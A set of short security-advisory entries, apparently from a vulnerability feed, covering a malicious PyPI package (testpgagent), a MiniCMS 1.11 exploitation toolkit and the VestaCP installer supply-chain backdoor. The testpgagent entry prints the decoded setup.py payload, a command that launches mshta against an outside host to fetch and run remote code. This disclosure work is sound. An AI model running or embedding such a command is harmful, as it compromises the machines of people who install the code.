MAL-2026-5824 Malicious code in testpgagent (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c3b12f57a72964e978d195ad7c3a9f6fe560ad1990d55bb1b4053d88a6bb9c4f On pip install, setup.py line 19 calls execbase64.b64decode... whose decoded body is import os; os.system'cmd /c "mshta http://fixars.top"'. This...

📄 MiniCMS 1.11 Exploitation Toolkit

This toolkit focuses on validating and demonstrating the impact of a known and documented design flaw in MiniCMS 1.11 related to its build process CVE-2018-1000638. MiniCMS relies on an insecure build.php script that blindly packages filesystem contents into install.php without enforcing integrit...

CVE-2018-25117 VestaCP Debian Installer Malicious Backdoor Supply Chain Compromise

VestaCP commit a3f0fa1 2018-05-31 up to commit ee03eff 2018-06-13 contain embedded malicious code that resulted in a supply-chain compromise. New installations created from the compromised installer since at least May 2018 were subject to installation of Linux/ChachaDDoS, a multi-stage DDoS bot...

VulnCheck KEV: CVE-2018-25117

VestaCP commit a3f0fa1 2018-05-31 up to commit ee03eff 2018-06-13 contain embedded malicious code that resulted in a supply-chain compromise. New installations created from the compromised installer since at least May 2018 were subject to installation of Linux/ChachaDDoS, a multi-stage DDoS...